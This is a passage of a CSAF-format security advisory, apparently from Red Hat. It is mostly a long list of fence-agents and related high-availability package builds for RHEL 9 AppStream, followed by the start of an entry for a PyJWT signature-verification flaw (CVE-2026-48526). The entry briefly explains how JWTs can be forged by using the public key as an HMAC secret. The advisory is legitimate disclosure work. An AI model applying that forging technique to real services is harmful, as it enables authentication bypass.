"name": "fence-agents-ibm-vpc-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibm-vpc-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-ibm-vpc-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ibmblade-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ibmblade-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-ibmblade-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ifmib-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ifmib-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-ifmib-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ilo-moonshot-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-moonshot-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-ilo-moonshot-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ilo-mp-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-mp-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-ilo-mp-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ilo-ssh-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo-ssh-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-ilo-ssh-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ilo2-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ilo2-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-ilo2-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-intelmodular-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-intelmodular-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-intelmodular-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ipdu-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ipdu-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-ipdu-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-ipmilan-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-ipmilan-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-ipmilan-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.aarch64"
},
"product_reference": "fence-agents-kdump-0:4.10.0-110.el9_8.3.aarch64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.ppc64le"
},
"product_reference": "fence-agents-kdump-0:4.10.0-110.el9_8.3.ppc64le",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.s390x"
},
"product_reference": "fence-agents-kdump-0:4.10.0-110.el9_8.3.s390x",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-agents-kdump-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.aarch64"
},
"product_reference": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.ppc64le"
},
"product_reference": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.s390x"
},
"product_reference": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-agents-kdump-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.aarch64"
},
"product_reference": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.aarch64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.ppc64le"
},
"product_reference": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.ppc64le",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.s390x"
},
"product_reference": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.s390x",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-agents-kubevirt-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.aarch64"
},
"product_reference": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.aarch64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.ppc64le"
},
"product_reference": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.ppc64le",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.s390x"
},
"product_reference": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.s390x",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-agents-kubevirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-lpar-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-lpar-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-lpar-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-mpath-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-mpath-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-mpath-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-nutanix-ahv-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-nutanix-ahv-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-nutanix-ahv-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-openstack-0:4.10.0-110.el9_8.3.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-openstack-0:4.10.0-110.el9_8.3.ppc64le"
},
"product_reference": "fence-agents-openstack-0:4.10.0-110.el9_8.3.ppc64le",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-openstack-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-openstack-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-agents-openstack-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.aarch64"
},
"product_reference": "fence-agents-redfish-0:4.10.0-110.el9_8.3.aarch64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.ppc64le"
},
"product_reference": "fence-agents-redfish-0:4.10.0-110.el9_8.3.ppc64le",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.s390x"
},
"product_reference": "fence-agents-redfish-0:4.10.0-110.el9_8.3.s390x",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-redfish-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-redfish-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-agents-redfish-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-rhevm-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rhevm-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-rhevm-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-rsa-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rsa-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-rsa-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-rsb-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-rsb-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-rsb-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-sbd-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-sbd-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-sbd-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-scsi-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-scsi-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-scsi-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-virsh-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-virsh-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-virsh-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-vmware-rest-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-vmware-rest-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-vmware-rest-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-vmware-soap-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-vmware-soap-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-vmware-soap-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-wti-0:4.10.0-110.el9_8.3.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-wti-0:4.10.0-110.el9_8.3.noarch"
},
"product_reference": "fence-agents-wti-0:4.10.0-110.el9_8.3.noarch",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-agents-zvm-0:4.10.0-110.el9_8.3.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-agents-zvm-0:4.10.0-110.el9_8.3.s390x"
},
"product_reference": "fence-agents-zvm-0:4.10.0-110.el9_8.3.s390x",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virt-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virt-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virt-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virt-debuginfo-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virt-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-cpg-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-cpg-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-cpg-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-cpg-debuginfo-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-cpg-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-cpg-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-debuginfo-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-libvirt-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-libvirt-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-libvirt-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-libvirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-libvirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-libvirt-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-multicast-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-multicast-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-multicast-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-multicast-debuginfo-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-multicast-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-multicast-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-serial-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-serial-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-serial-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-serial-debuginfo-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-serial-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-serial-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-tcp-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-tcp-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-tcp-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "fence-virtd-tcp-debuginfo-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:fence-virtd-tcp-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "fence-virtd-tcp-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ha-cloud-support-0:4.10.0-110.el9_8.3.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-0:4.10.0-110.el9_8.3.ppc64le"
},
"product_reference": "ha-cloud-support-0:4.10.0-110.el9_8.3.ppc64le",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ha-cloud-support-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "ha-cloud-support-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ha-cloud-support-debuginfo-0:4.10.0-110.el9_8.3.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.8.0.Z.MAIN.EUS:ha-cloud-support-debuginfo-0:4.10.0-110.el9_8.3.x86_64"
},
"product_reference": "ha-cloud-support-debuginfo-0:4.10.0-110.el9_8.3.x86_64",
"relates_to_product_reference": "AppStream-9.8.0.Z.MAIN.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-48526",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-05-28T16:01:22.805235+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482734"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer\u0027s public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pyjwt: PyJWT: Authentication bypass due to forged JSON Web Tokens",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
